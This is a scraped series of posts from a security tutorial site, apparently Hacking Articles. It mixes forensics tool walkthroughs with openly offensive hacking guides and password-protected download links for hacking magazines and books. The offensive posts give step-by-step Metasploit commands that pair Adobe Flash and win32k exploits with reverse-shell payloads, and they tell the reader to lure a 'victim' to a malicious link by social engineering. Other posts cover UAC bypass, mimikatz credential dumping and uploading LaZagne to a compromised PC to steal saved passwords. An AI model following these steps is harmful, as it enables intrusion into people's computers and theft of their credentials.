DFF (Digital Forensics Framework) is a free and Open Source computer forensics software built on top of a dedicated Application Programming Interface (API).

It can be used both by professional and non-expert people in order to quickly and easily collect, preserve and reveal digital evidences without compromising systems and data.

To install DFF (Digital Forensics Framework), firstly install python from link given below

Python from Here.

Install PyQt4 from Here These both are prerequisite for DFF.

Now click on I Agree Option

Select the type of install & click on Next.

Choose Python Installation Folder & click on Install.

Now Install DFF from Here & click on Next.

Click on I Agree to proceed Further.

Now Choose Destination Folder to Install DFF 7 clicks on Next.

Now Choose Start Menu Folder & Click on Install.

Click on Finish to complete the installation.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post How to Install Digital Forensics Framework in System appeared first on Hacking Articles.

First Download autopsy from here and install in your pc. Click ‘Create a New Case’ option.

A new page will open. Enter the details in ‘Case Name’ and ‘Base Directory’ and choose the location to save the report e.g. :c\users\raj\desktop\auto. Then click on next to proceed to next step. 

Here in next step you have to enter the case number and Examiner details and click on finish to proceed to next step.

A new window will open .It will ask for add data source in Step 1. Select source type to add & browse the file Path and click on NEXT Option to proceed further.

In Step 2.  Configure ingest Modules I have chosen all the modules as I am looking for complete information on evidence device or disk or system  etc. and click next to proceed further.

In Add Data Source just click on finish to generate the report of the device and you can perform complete investigate on the victim device or system or any other disk. It will process the data Source and add it to local database.

After Process completion, it will show Forensic Investigation Report. Now click on Devices Attached option, it will show the list of attached device with system.

Now click on EXIF Metadata (Exchangeable image file format for images, sound used by Digital Camera, Smartphone and scanner). It will show the image files.

Now click on Installed Programs to see the entire installed programs in the system.

Click Operating System Information. It will show the entire operating system list.

Now Select Operating System User Account Option . It will Display  the name of all the user Accounts.

Now click on Recent Documents Option, it will display latest created or opened documents.

Click Web Bookmarks Option to see all the bookmarks by system users in different browsers.

To see web cookies, select web cookies option.

To See Web Downloads, Click on Web Downloads option.

To check internet History, click on Web History Option.

To see the history of internet search, click on Web Search Option.

To see the list of all email ids in the system, click on email address.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post Live Forensics Case Investigation using Autopsy appeared first on Hacking Articles.

Hakin9 is a Polish online publication on IT Security. The magazine also features some articles in English, German and French. A limited number of free articles are available on their web site. The full version of the magazine is available online to subscribers.
Hakin9 is a source of news and information about offensive hacking methods as well as ways of securing systems, networks and applications.

Hakin9’s first edition was released in 2005, then after a few-month-long break the real editing process started in September 2006.

2005
Hakin9 (01_2005) – Cisco IOS Insecurity.pdf
Hakin9 (02_2005) – Vulnerable Mobiles.pdf
Hakin9 (03_2005) – Snooping On Monitor Displays.pdf
Hakin9 (04_2005) – Hacking BlueTooth.pdf
Hakin9 (05_2005) – Anatomy of Pharming.pdf

2006
Hakin9 (01_2006) – Rootkits Under Windows.pdf
Hakin9 (02_2006) – Fighting Malicious Code.pdf

2007
Hakin9 (01_2007) – Taking Control of a Running Process.pdf
Hakin9 (02_2007) – Timing Attacks.pdf
Hakin9 (03_2007) – Haking Oracle.pdf
Hakin9 (04_2007) – Haking Microsoft’s .Net.pdf
Hakin9 (05_2007) – Online Fraud Danger.pdf
Hakin9 (06_2007) – Rootkits For Windows.pdf
Hakin9 STARTER_KIT (01_2007) – Searching For Google’s Secrets.pdf
Hakin9 STARTER_KIT (02_2007) – Knock Knock Knocking.pdf
Hakin9 STARTER_KIT (03_2007) – Exploiting Software.pdf

2008
Hakin9 (01_2008) – No Backdoor Try Opening The Windows.pdf
Hakin9 (02_2008) – VOIP Abuse.pdf
Hakin9 (03_2008) – LDAP Cracking.pdf
Hakin9 (04_2008) – File Inclusion Attacks.pdf
Hakin9 (05_2008) – Kernal Hacking.pdf
Hakin9 (06_2008) – Hacking WiFi.pdf

2009
Hakin9 (01_2009) – Haking Instant Messenger.pdf
Hakin9 (02_2009) – The Real World Click Jacking.pdf
Hakin9 (03_2009) – Breaking Client-Side Certificate Protection.pdf
Hakin9 (04_2009) – My ERP Got Hacked.pdf
Hakin9 (05_2009) – 21st Century Hacking Techniques.pdf
Hakin9 (06_2009) – Windows FE.pdf
Hakin9 TBO (01_2009).pdf

2010
Hakin9 (1_2010) -Hardware Keylogger A Serious Threat.pdf
Hakin9 (2_2010) – Mobile Exploitation.pdf
Hakin9 (3_2010) – Analyzing Malware and Malicious Content.pdf
Hakin9 (4_2010) – Flash Memory Mobile Forensic.pdf
Hakin9 (5_2010) – Is DDOS Still A Threat.pdf
Hakin9 (6_2010) – Securing VOIP.pdf
Hakin9 (7_2010) – Securing The Cloud.pdf
Hakin9 (8_2010) – Mobile Malware The New Cyber Threat.pdf
Hakin9 (9_2010) – Email Security.pdf
Hakin9 (10_2010) – Spyware.pdf
Hakin9 (11_2010) – Botnets, Malware, Spyware How to Fight Back.pdf
Hakin9 STARTER_KIT (01_2010) – Snort Exposed.pdf
Hakin9 TBO (01_2010).pdf

2011
Hakin9 (01_2011) – Cybercrime and Cyber War Predictions for 2011.pdf
Hakin9 (02_2011) – Network Security.pdf
Hakin9 (03_2011) – ID Theft.pdf
Hakin9 (04_2011) – Mobile Security.pdf
Hakin9 (05_2011) – Cloud Security.pdf
Hakin9 (06_2011) – Insecure Access Control.pdf
Hakin9 (07_2011) – Web App Security.pdf
Hakin9 (08_2011) – Hackin RFID.pdf
Hakin9 (09_2011) – Secure Coding.pdf
Hakin9 (10_2011) – Hack Apple.pdf
Hakin9 (11_2011) – Hacking Data.pdf
Hakin9 (12_2011) – TOR Project.pdf

Hakin9 Exploiting Software
Hakin9 EXPLOITING_SOFTWARE (01_2011) – Smashing The Stack.pdf
Hakin9 EXPLOITING_SOFTWARE (02_2011) – Exploit Format Strings With Python.pdf
Hakin9 EXPLOITING_SOFTWARE (03_2011) – Password What Password.pdf
Hakin9 EXPLOITING_SOFTWARE (04_2011) – ShellCode.pdf

Hakin9 Extra
Hakin9 EXTRA (01_2011) – Exploiting Software.pdf
Hakin9 EXTRA (02_2011) – ID Thefts.pdf
Hakin9 EXTRA (03_2011) – Forensics.pdf
Hakin9 EXTRA (04_2011) – Android Security.pdf
Hakin9 EXTRA (04_2011) – Wireless Security.pdf
Hakin9 EXTRA (05_2011) – Haking Botnet.pdf
Hakin9 EXTRA (06_2011) – Rootkit.pdf

Hakin9 Mobile Security
Hakin9 MOBILE SECURITY (01_2011) – IOS Vulnerability.pdf

Hakin9 Starter Kit
Hakin9 STARTER_KIT (01_2011) – Paypal Is A Scam.pdf
Hakin9 STARTER_KIT (02_2011) – Termination The Internet.pdf

2012
Hakin9 (01_2012) – SQL Injection.pdf
Hakin9 (02_2012) – When I’m X64.pdf
Hakin9 (03_2012) – DNS Cache Poisoning.pdf
Hakin9 (04_2012) – Cyber Warfare.pdf
Hakin9 (05_2012) – Cloud Computing.pdf
Hakin9 (06_2012) – Biometrics.pdf
Hakin9 (07_2012) – GreenSQL.pdf
Hakin9 (08_2012) – Malware.pdf
Hakin9 (09_2012) – Network Security.pdf
Hakin9 (10_2012) – Hacking Oracle.epub
Hakin9 (10_2012) – Hacking Oracle.pdf
Hakin9 (11_2012) – Mobile Security.epub
Hakin9 (11_2012) – Mobile Security.pdf
Hakin9 (12_2012) – Enterprise Network Security.epub

Hakin9 Exploiting Software
Hakin9 EXPLOITING_SOFTWARE (10_2012) – A Manual To Reverse Engineer
Hakin9 EXPLOITING_SOFTWARE – Bible.pdf
Hakin9 EXPLOITING_SOFTWARE (01_2012) – Blackhole Exploint Kit.pdf
Hakin9 EXPLOITING_SOFTWARE (02_2012) – Hardening of Java Applications Against AOP.pdf
Hakin9 EXPLOITING_SOFTWARE (03_2012) – Security Onion.pdf
Hakin9 EXPLOITING_SOFTWARE (04_2012) – Cisco IOS Rootkits and Malware.pdf
Hakin9 EXPLOITING_SOFTWARE (05_2012) – Buffer Overflow.pdf
Hakin9 EXPLOITING_SOFTWARE (06_2012) – Pentesting With Android.pdf
Hakin9 EXPLOITING_SOFTWARE (07_2012) – SamuraiWTF Toolkit.pdf
Hakin9 EXPLOITING_SOFTWARE (08_2012) – Raspberry Pi Hacking.pdf
Hakin9 EXPLOITING_SOFTWARE (09_2012) – Metasploit In A Nutshell.epub
Hakin9 EXPLOITING_SOFTWARE (09_2012) – Metasploit In A Nutshell.pdf

Hakin9 Extra
Hakin9 EXTRA (01_2012) – Cryptography.pdf
Hakin9 EXTRA (02_2012) – Honeypots.pdf
Hakin9 EXTRA (03_2012) – Hacking Hardware.pdf
Hakin9 EXTRA (04_2012) – Forensics In The Cloud.pdf
Hakin9 EXTRA (05_2012) – Adobe Security.pdf
Hakin9 EXTRA (06_2012) – Timing Attacks.pdf
Hakin9 EXTRA (07_2012) – Quantum Computing.pdf
Hakin9 EXTRA (08_2012) – Helix.pdf
Hakin9 EXTRA (09_2012) – Webserver Security.pdf
Hakin9 EXTRA (10_2012) – How To Boost Your Cloud.pdf
Hakin9 EXTRA (11_2012) – Biometrics Security.epub
Hakin9 EXTRA (11_2012) – Biometrics Security.pdf

Hakin9 Mobile Security
Hakin9 MOBILE_SECURITY (01_2012) – Tag You’re Infected.pdf
Hakin9 MOBILE_SECURITY (02_2012) – Data Handling On IOS Devices.pdf
Hakin9 MOBILE_SECURITY (03_2012) – Mobile Device Security.pdf

Hakin9 On Demand
Hakin9 ON_DEMAND (01_2012) – SQL Injection.pdf
Hakin9 ON_DEMAND (02_2012) – Torjan-izing USB Stics.pdf
Hakin9 ON_DEMAND (03_2012) – The Guide to Backtrack.pdf
Hakin9 ON_DEMAND (04_2012) – Network Security.pdf
Hakin9 ON_DEMAND (05_2012) – Connection Overload.pdf
Hakin9 ON_DEMAND (06_2012) – Ultimate Nessus 5 Tutorial.pdf
Hakin9 ON_DEMAND (07_2012) – Wireshark Sharks On The Wire.epub
Hakin9 ON_DEMAND (07_2012) – Wireshark Sharks On The Wire.pdf
Hakin9 ON_DEMAND (08_2012) – Exploiting Linux Kernal.epub
Hakin9 ON_DEMAND (08_2012) – Exploiting Linux Kernal.pdf
Hakin9 ON_DEMAND (09_2012) – Wireshark Sharks On The Wire 2.pdf

TBO
Hakin9 TBO (01_2012) – The Ultimate Guide To Mobile Security.pdf
Hakin9 TBO (03_2012) – Best of Network Scanning.pdf

Hakin9 BIBLE (01_2012).pdf
Hakin9 FOR_FREE (01_2012).pdf

2013
Hakin9 (01_2013) – Fight The Spyware.epub
Hakin9 (01_2013) – Fight The Spyware.pdf
Hakin9 (02_2013) – DDOS Tutorials.pdf
Hakin9 (03_2013) – Hacking Android.epub
Hakin9 (03_2013) – Hacking Android.pdf
Hakin9 (04_2013) – A Guide To NMAP The Second Encounter.epub
Hakin9 (04_2013) – A Guide To NMAP The Second Encounter.pdf
Hakin9 (05_2013) – Offensive Programming.epub
Hakin9 (05_2013) – Offensive Programming.pdf
Hakin9 (06_2013) – Advanced Malware Analysis.epub
Hakin9 (06_2013) – Advanced Malware Analysis.pdf
Hakin9 (07_2013) – QR Code Haking.epub
Hakin9 (07_2013) – QR Code Haking.pdf
Hakin9 (08_2013) – C++ Vs Python.epub
Hakin9 (09_2013) – Network Security & SQL Injection.pdf

Hakin9 Exploiting Software
Hakin9 EXPLOITING_SOFTWARE (01_2013) – Exploiting SAP.epub
Hakin9 EXPLOITING_SOFTWARE (01_2013) – Exploiting SAP.pdf
Hakin9 EXPLOITING_SOFTWARE TBO (01_2013) – Metasploit Tutorials.pdf

Hakin9 Extra
Hakin9 EXTRA (01_2013) – Backtrack 5 R3.epub
Hakin9 EXTRA (01_2013) – Backtrack 5 R3.pdf
Hakin9 EXTRA (02_2013) – Mobile Hacking.epub
Hakin9 EXTRA (02_2013) – Mobile Hacking.pdf
Hakin9 EXTRA (03_2013) – Guide To Kali Linux.epub
Hakin9 EXTRA (03_2013) – Guide To Kali Linux.pdf

Hakin9 On Demand
Hakin9 ON_DEMAND (01_2013) – CyberSecurity.epub
Hakin9 ON_DEMAND (01_2013) – CyberSecurity.pdf
Hakin9 ON_DEMAND (02_2013) – Internet Based World Security.epub
Hakin9 ON_DEMAND (02_2013) – Internet Based World Security.pdf
Hakin9 ON_DEMAND (03_2013) – Reverse Engineering Tutorials.pdf
Hakin9 ON_DEMAND (04_2013) – Advanced Web Attacks and Exploitations.epub
Hakin9 ON_DEMAND (04_2013) – Advanced Web Attacks and Exploitations.pdf
Hakin9 ON_DEMAND (05_2013) – Advanced Windows Exploitations.pdf
Hakin9 ON_DEMAND (06_2013) – BIOS Security.epub
Hakin9 ON_DEMAND (06_2013) – BIOS Security.pdf
Hakin9 ON_DEMAND (07_2013) – Exploitation Compendium.epub
Hakin9 ON_DEMAND (07_2013) – Exploitation Compendium.pdf

Hakin9 Open
Hakin9 OPEN (01_2013) – How To Use Metasploit For Security Defense.epub
Hakin9 OPEN (01_2013) – How To Use Metasploit For Security Defense.pdf
Hakin9 OPEN (02_2013) – How To Brute Force Drupal 6 Login Pages.epub
Hakin9 OPEN (02_2013) – How To Brute Force Drupal 6 Login Pages.pdf
Hakin9 OPEN (03_2013) – How To Detect System Intrusion.pdf
Hakin9 OPEN (04_2013) – Cyber Threats Solutions.epub
Hakin9 OPEN (04_2013) – Cyber Threats Solutions.pdf

Hakin9 Starter Kit
Hakin9 STARTER_KIT (01_2013) – Beginners Guide To Hacking
Hakin9 STARTER_KIT (02_2013) – A Beginners Guide To Software Exploitation.pdf
Hakin9 STARTER_KIT (03_2013) – How To Pentest With BackTrack.pdf

Hakin9 TBO
Hakin9 TBO (01_2013) – Wifi Hacking.pdf
Hakin9 TBO (02_2013) – Exploiting Software.pdf
Hakin9 TBO (03_2013) – Advanced Backtrack Set.pdf

Python Triple Pack
Software Developer Journal – Python Programming (12_2013).pdf
Software Developer Journal – Python Starter Kit (13_2013).pdf

Hakin9 Ebooks
Defend Yourself
Nmap Guide
Public Key Cryptostructure
Don’t Be Mocked Secure Your System.pdf
Low Tech Hacking.pdf
Malware – From Basic Cleaning To Anaylsing.pdf

Tutorials
CEHv7 – Study Guide 1.pdf
CEHv7 – Study Guide 2.pdf
CEHv7 – Study Guide 3.pdf
Crypto Tutorial 1.pdf
Crypto Tutorial 2.pdf
Crypto Tutorial 3.pdf
Crypto Tutorial 4.pdf
Metasploit and SET Install on Apple iDevice.pdf

Download

Password: www.hackingarticles.in

The post Free Download Hakin9 Magazine 2005 To 2013 Full Collection appeared first on Hacking Articles.

Compare It! displays 2 files side by side, with colored differences sections to simplify analyzing.  You can move changes between files with single mouse click or keystroke, and of course you have ability to edit files directly in comparison window. It can make colored printout of differences report, exactly as it’s on the screen. It supports regular expressions, so you could easily strip XML tags from file to compare XML with XML or XML with text!? While running on all MS Windows variants, Compare It! can compare merge save text files from DOS, Windows, UNIX, Mac systems. It can create HTML report of your results.
Compare It

First of all install the Compare It from the Link given below.

http://www.grigsoft.com/wincmp3.htm

Click on Compare It Tool, It will show a window to select the files to be compared.

First select the first file and click on open and then select the second file and click on open.

Now it will show us the changes in highlighted bar.

Now click on View and select Next Change and it will show the next change.

Now click on view and select Changes only. It will show all the changes simultaneously.

Now click on Merge and Select Separate Option.It will separate the changed lines.

Now select Edit checkbox in status bar. The cursor will move to the changed line and now the text can be edited.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post Comparison of two Files for forensics investigation by Compare IT appeared first on Hacking Articles.

CSCU Module 01 Foundations of Security

CSCU Module 02 Securing Operating Systems

CSCU Module 03 Protecting Systems Using Antiviruses

CSCU Module 04 Data Encryption

CSCU Module 05 Data Backup and Disaster Recovery

CSCU Module 06 Internet Security

CSCU Module 07 Securing Network Connections

CSCU Module 08 Securing Online Transactions

CSCU Module 09 Securing Email Communications

CSCU Module 10 Social Engineering and Identity Theft

CSCU Module 11 Security on Social Networking Sites

CSCU Module 12 Information Security and Legal Compliance

CSCU Module 13 Securing Mobile Devices

Download

Password: www.hackingarticles.in

The post CSCU Instructor Slides appeared first on Hacking Articles.

Download

The post Hacking Ultimate Hacking for Beginners, How to Hack appeared first on Hacking Articles.

FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents its scans. These documents may be on web pages, and can be downloaded and analyzed with FOCA.

It is capable of analyzing a wide variety of documents, with the most common being Microsoft Office, Open Office, or PDF files, although it also analyzes Adobe, In Design or SVG files, for instance.

First of all, download the FOCA from the given below link.

https://www.elevenpaths.com/labstools/foca/index.html

Now click on Project & then select New Project.

Now enter the Project Name, name of the website and name of the folder where we have to save the documents and click on create to proceed further.

Now enter the name of the file where documents will be saved and click on save.

Now it will show Document collecting window, click on Search All option.

Now it will show the list of documents. Now right click on the URL and click on Download to save it in the specified folder.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him atmukul@ignitetechnologies.in

The post Extract the metadata Information of Any website using Foca appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post The Hacker Playbook 2 Practical Guide To Penetration Testing appeared first on Hacking Articles.

First of all download the OSForensics from here.

Select Create Signature Option. Click on Config 

Now browse the desired Directory from Directory list management, in my case I am selecting Desktop.

Click on Add to list Option to include the directory. Click OK

Now in start folder option, it will show us the selected Drive i.e. c:\users\raj\desktop. Click on the Start Option.

It will ask for the File Name, enter the File Name & click on Save. So signature for data drive will be created.

Now does some modification in data drive and repeat the same steps to create another signature after modifications in data drive.

Now click on Compare Signature Option.

Browse both files i.e. Old Signature as well as New Signature Option.

Click on Compare option .It will start the process. Now it will show us the files with their modification status as well as their creation and modification date. We can select show option to see only modified or deleted files.

Now it will show only deleted or modified files with their creation and deletion date.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact himatmukul@ignitetechnologies.in

The post Forensics Investigation of Deleted Files in a Drive appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post 101 Best Forensics Tutorials appeared first on Hacking Articles.

Forensics Investigation of Deleted Files in a Drive

Comparison of two Files for forensics investigation by Compare IT

Live Forensics Case Investigation using Autopsy

How to Install Digital Forensics Framework in System

How to Mount RAW Image and ISO Image as a Drive using OSF Mount

Forensics Investigation of Facebook, Skype, and Browsers in RAW Image using IEF (Internet Evidence Finder)

How to Create Drive Image for Forensic Purpose using Forensic Replicator

Outlook Forensics Investigation using E-Mail Examiner

How to Preserve Forensics Image file Timestamp

How to identify any Suspicious changes to files or directory (Disk Drive Signature)

Forensics Investigation of Evidence RAW Image using OS Forensics Tool

How to Create and Convert RAW Image in Encase and AFF Format using Forensics Imager

How to Mount Forensics image as a Drive using P2 eXplorer Pro

How to Convert Encase, FTK, DD, RAW, VMWare and other image file as Windows Drive

How to gather Forensics Investigation Evidence using ProDiscover Basic

How to study Forensics Evidence of PC using P2 Commander (Part 2)

How to Collect Forensics Evidence of PC using P2 Commander (Part 1)

How to Create Forensics Image of PC using R-Drive Image

Forensic Investigation of victim pc using Autopsy

Forensic Investigation of any Twitter account

How to Perform Forensic Investigation on YouTube

How to perform Forensic Investigation on user Linkedin Account

Forensic Investigation of any FaceBook Profile

How to create copy of Suspects Evidence Using (FTK Imager)

How to find the usage of files in Remote victim PC (Remote PC Forensics)

How to Collect Telephonic Evidence in Victim PC

How to Collect Email Evidence in Victim PC (Email Forensics)

Forensics Analysis of Social Media Sites like Facebook, Twitter, LinkedIn

Forensics Investigation of Remote PC (Part 2)

Forensics Investigation of Remote PC (Part 1)

Volatility – An advanced memory forensics framework

DumpIt – RAM Capture Tool

How to View Last Activity of Your PC

How to view Date & Time of any Captured JPEG Image

Antivirus Forensics Tools

BFT (Browser Forensic Tool )

How to View System Reboot Date and Time

Hacking Computer forensics Exposed

List of Computer Forensics Tools (Part 1)

Find Last Connected USB on your system (USB Forensics)

The post Best of Computer Forensics Tutorials appeared first on Hacking Articles.

This module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the “width” attribute of the ShaderJob after starting the job it’s possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169, and Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.

Exploit Targets

Windows 7

Firefox 38.0.5

Adobe Flash 17.0.0.169

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/windows/browser/adobe_flash_shader_job_overflow

msf exploit (adobe_flash_shader_job_overflow)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_shader_job_overflow)>set lhost 192.168.0.160 (IP of Local Host)

msf exploit (adobe_flash_shader_job_overflow)>set srvhost 192.168.0.160

msf exploit (adobe_flash_shader_job_overflow)>set uripath /

msf exploit (adobe_flash_shader_job_overflow)>exploit

Now an URL you should give to your victim http://192.168.0.160:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.160:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into Victims command prompt.

The post Hack Remote Windows PC using Adobe Flash Player ShaderJob Buffer Overflow appeared first on Hacking Articles.

DriveClone is a hard disk (HDD) & solid state drive (SSD) cloning and migration software. DriveClone is a time & money saver for server migration, raid upgrading, and system cloning

DriveClone automatically clones your entire machine, including system files, applications, preferences, emails, music, photos, movies, documents, and all partitions. But what makes DriveClone different from other disk cloning applications is that it not only clones all data on a system, it automatically defrags all files, removes junks, resizes partitions, and only clone the files that have been changed since last cloning.

Drive Clone Key Features

• Keepnew! An exact copy of Hard disk or SSD
• Clone different sizes disks
• Schedule incremental cloningnew!
• Near real-time MirrorDrivenew!
• Rapid cloning (2X faster)new!
• Partition 4K alignednew!
• Tools to fix boot issues & retain GUIDnew!
• DriveClone data migration is in Windows
• Allows user keep working during migration process
• Cloned disk is immediately bootable
• Volume and sector-by-sector cloning
• Smart cloningunique saves up to 70GB by excluding temp and redundant files
• Universal cloningunique allows booting on other machine
• Turn your external hard drive into a Mirror Drive unique
• Factory Recovery Partition Cloning unique
• Keep up to 99 File Versions on Mirror Driveunique (MirrorDrive)
• Defrag Cloning uniquewill increase life-span & performance
• Directly convert a PC to VMware & Hyper-v virtual machines unique
• Support SecureBoot, GPT, UEFI, and Dynamic Diskunique
• Support all sizes (64GB/128GB/260GB/500GB/750GB/1TB/2TB/4TB or larger)
• Support all drives (Seagate, WDC, Fujitsu, Hitachi, etc)
• Raid to Hard disk/SSD cloning and migration; and vice versa

First Download DriveClone from here and install in your pc .Drive Clone Workstation is designed to completely copy all files, applications and Windows system from one Hard Drive/SSD/Flash to another Hard Drive/SSD/Flash. You can easily clone your Hard Drive/SSD/Flash to a different size SSD drive (smaller or bigger) for better performance. Drive Clone Workstation will automatically adjust and resize partitions during cloning process to reduce the process complications.

Start DriveClone Workstation.

Double click on One Time Cloning. Clone Drive/Partition(s) duplicates one hard drive or SSD to another hard drive or SSD, and it is immediately bootable. It eliminates the need of re-installing the operating system, drivers and applications when upgrading to a new hard drive or SSD with only a few mouse clicks.

Now Select a Source Disk/Partition and then a Destination Disk/Partition. Click on NEXT to Proceed   further.

It will Show the window popup. Click on YES to continue.

Now it will show two options i.e. Rapid Cloning and Normal Cloning. Check either Rapid Cloning or Normal Cloning and click on Next.

Select Start or Previous option. Previous option is used to modify the current settings. And Start option is used to proceed further.

 Now it will show One- Time cloning process.

Now it will show the message cloning completed. Click on Finish.

Now select the target drive and it will show the contents of cloned drive.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contacthimatmukul@ignitetechnologies.in

The post How to Clone Drive for Forensics Purpose appeared first on Hacking Articles.

The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software. At this moment, it supports 22 Programs on Microsoft Windows and 12 on a Linux/Unix-Like OS.

First download LaZagne project from here

Launch all modules type laZagne.exe all

Launch only a specific module

laZagne.exe browsers

The post Hack Saved Password in Windows and Linux PC using LaZagne Project appeared first on Hacking Articles.

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you had a remote shell with Metasploit all now use the Bypass UAC module, set the session number and exploit it

use exploit/windows/local/bypassuac

msf exploit (bypassuac_injection)>set session 1

msf exploit (bypassuac_injection)>exploit

mimikatz is a tool I’ve made to learn C and make somes experiments with Windows security. It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory.

Now type load kiwi Then type, “creds_all

The post Hack the Password in Plain text of Remote Windows PC appeared first on Hacking Articles.

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64..

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/local/ms15_051_client_copy_image

msf exploit (ms15_051_client_copy_image)>set payload windows/meterpreter/reverse_tcp

msf exploit (ms15_051_client_copy_image)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (ms15_051_client_copy_image)>set session 1

msf exploit (ms15_051_client_copy_image)>exploit

The post Hack Remote Windows PC using Windows Client Copy Image Win32k Exploit appeared first on Hacking Articles.

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Now download LaZagne project from here and extract in your pc. You can find the lazagne.exe file in folder.

Now use the upload command to send a file to the target system.

Launch all modules type laZagne.exe all will dump all the passwords that it can find all saved password in Google chrome

You can see windows secret passwords

You can see all saved wifi profile passwords

The post Hack Browsers, Chat, Databases, Mails, Wifi Password in Remote Windows or Linux PC appeared first on Hacking Articles.

First of all, download the Belkasoft Evidence Center ultimate from this link.

Click on New Option to select the Raw Image.

Enter the Case Name.

Select the Root folder where Forensic Evidence will be created.

Then type the name of the investigator and Case Description. Click Ok.

Now select the Raw Image and Check the Option Analyze Data Source. Click on Next.

Now Select from supported data types and click on Next.

Now Select all and Click on Finish.

To visualize the cached sites exactly as seen by the user, Click on Cache in Browsers option.

To see Downloaded file list, click on Downloaded Files.

To Check the List of Sites Visited by the user, select Sites Option.

To see Cookie List, Click on Cookies Option.

Now click on Documents option and Then Select Found Documents option to see all the office Documents files found in user pc.

To see all the encrypted files, click on Found Encrypted files option.  It will detect   more than 150 types of encrypted files. It is also possible to decrypt all these encrypted files with in this product by installing Passware   kit Forensic integrated with Belkasoft Product.

To Find Picture List, Select Found Pictures in Pictures Option. To Detect Forgery in Picture.  Right click on Picture, Select Analyze Pictures and Click on Detect Forgery Tab.

To find the recent files opened by Acrobat Reader, Click on Adobe Acrobat Reader Recent Option.

To See Recent applications run by user, Click on Last Application and Paths in NTUSER.DAT Option. NTUSER.DAT is a registry file in Windows Operating System .Every user profile contains an NTUSER.DAT file.  It contains a unique Documents Folder, Start menu Configuration, Desktop properties and browsing history

To see last Selected Files by the user, Click on Last Selected Files.

To check the recent files opened by user, Click on Recent files option.

To detect latest searches by the user, click on Searches option.

To find the latest accessed files by the user , click on Recently accessed documents.

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post Forensics Investigon of RAW Images using Belkasoft Evidence Center appeared first on Hacking Articles.

This module exploits a memory corruption happening when applying a Shader as a drawing fill as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/windows/browser/adobe_flash_shader_drawing_fill

msf exploit (adobe_flash_shader_drawing_fill)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_shader_drawing_fill)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (adobe_flash_shader_drawing_fill)>set srvhost 192.168.0.125

msf exploit (adobe_flash_shader_drawing_fill)>set uripath /

msf exploit (adobe_flash_shader_drawing_fill)>exploit

Now an URL you should give to your victim http://192.168.0.125:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.125:8080) a session will be opened as shown below.

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into Victims command prompt.

